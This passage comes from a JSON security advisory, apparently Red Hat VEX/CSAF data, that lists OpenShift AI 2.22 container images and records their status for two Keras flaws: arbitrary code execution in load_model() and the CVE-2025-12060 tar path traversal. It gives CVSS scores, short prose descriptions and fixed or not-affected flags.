"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Arbitary Code execution in Keras load_model()"
},
{
"cve": "CVE-2025-12060",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-30T18:01:32.193676+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0f03bb40db834eb444df20dd54473d082ccc6816df6efa0e6166dcaf8c86e3ab_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:65953d54df30fcba632c78d2bdabce81796413baeee6a826d0815df45b99d527_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:f43e263fe3aafc8db04394c9132ec7d7cc2b836fc690cd37b1a8892137ea8773_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-operator-rhel9@sha256:901efe4e9867390a89d61d5c945b72b5e2db87202c919a43579f0ca7cfa4cf96_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-registry-rhel9@sha256:e0a67c5465369eae8e98ccee093dd09f5ccdb445903e2aaec30c978b2b7f10f3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-rhel9@sha256:a3c3c17e6092e760923a8b68c98c6d26c30f81da2f04f0d2e9727461254c7c1a_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel9@sha256:4fb05694fa67a519e11f331e3f1ccf42b1432db2f31b2a857d1f2b3e4e1bd0a3_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-notebook-controller-rhel9@sha256:e940d2ce5f41edfbf07e5ae895fa3caa446c013abd41c7cd6d2758ee7336881c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-operator-bundle@sha256:bd589f792b321203c6ffe2bf92e47f1e3951fbd29a8be65529cc5766bff94c98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:67e8ec35eb13e8a46a46955f33bbc8eeb18d757a5f40935219218ebb750d5eda_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:8b76cfe4556e2b4a8f5207304c06d7ea83992e223926b8802ddd7b2ee413431d_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:a54f8bf1f15cd0ab0a13dbb0b0d4295748e8a5ae8b938a38417d9ea5b1d78396_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-rhel9-operator@sha256:b8d56e4d1a79cf0840284ad245a86e16db33a2239fd429e38752bf4d27a7dd9e_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-training-operator-rhel9@sha256:251d85ebf9721e704561b6e6a5822106887f24b0602ce50e9d70e2db1817ee7d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel9@sha256:3038dad86bc403803c630511c3808ec35ddaa3260cc1280f8f4afbf538eb507d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-trustyai-service-rhel9@sha256:51d96b6945dee9049b7728f4612a01a46dd8b533bf76cced602d032ccd03f4da_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407443"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw has been discovered in the keras Python library. when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Keras Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel9@sha256:1dd295d8062d8846ffb2534b2597e2791bd67387904b3d4ccf58cf3424d3250b_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-codeflare-operator-rhel9@sha256:8b3e0152680063828a54187feec06600de866db91ab219911b1c3ab50d8b1b7c_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:3f8491f3004efaaf8a508cc7ad139dafae667a3c2f3e31736ade9997e4eb789b_s390x",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:7908a416df1a7a29de0fc89b788c7fb8a3fba85a2e80cd93a52efcf20d0c2fdd_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:bbb139905574a6d29e855a0a6df56f71e036f3e425ee3393a70e384610939259_ppc64le",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-dashboard-rhel9@sha256:fe5d3cdb7fb4658dc46111d20ee03b890b438458ee7d20a55871d59a35a3b926_arm64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel9@sha256:86ac0f8f1d05b6fb02523108448414ec494d630544b3eb6de2f1ad593e67f704_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel9@sha256:c7456669d7f87f0194f4dd38559c73d75c441027c25cd487a24b25d7539f917d_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel9@sha256:f27180fd3c4c24fdc014bf09554a16a598a4215d7e9d1106015d7b5e976167fe_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feast-operator-rhel9@sha256:3fa33fb9fd238dda3dd0dbc5243d0ec3e82083fb9ecf557a5f8a5b67afc77ba8_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-feature-server-rhel9@sha256:d5d52b368050d505183452f1d8b5170c86f7473fd869a886777d3bf7e48aad76_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel9@sha256:687875287e4317041637f6b47741e484df49e3b2d55ef871021e4ac9f0d99886_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel9@sha256:2d796962cc7622fcc7eb0456eb70439cbb04a5e679f7de8826416a99a9851c62_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-kueue-controller-rhel9@sha256:b7de90247a93ad5b39c83be7cea5ba4a36d1cb55a37179157433edce2d2a9c63_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel9@sha256:854eb235c46dc89cbd324d4b632ff0d07840d3e60744c66e9be8298d3d3d4631_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel9@sha256:f092ae49cdb78c33c051718472448bfd16d4d50918116b3fe988dec267abd2bb_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel9@sha256:46a17b6f764f05a7f81ce3d9c01dd24f11049bfc9f625a4953fd68f7935fe2a4_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel9@sha256:3cbc5336af0b8c06c641d864d7b45ce04576e38dbc8636573abb94c37eedeb18_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-runtime-generic-rhel9@sha256:65a5dbc53f8f89bf05f4eac1081c022d3d7459917025c8e99a684f6be679eb98_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel9@sha256:8c97392bb11def5cf310f7992d19d22b4f015e0040faf0fe59044ac63c186d2f_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel9@sha256:bfa7bfad599fed7e758dcd892f6a207144070daf288339b25186f94e8b763a1b_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel9@sha256:974ebc1a016a1ccac1683fee653afedd2628e2315cf2cc726b40fb5135aaca93_amd64",
"Red Hat OpenShift AI 2.22:registry.redhat.io/rhoai/odh-model-controller-rhel9@sha256:0bd79a7eecc255d6d69acd0002c517652638cdf31a0014aa534bf8e3b233b667_arm64",
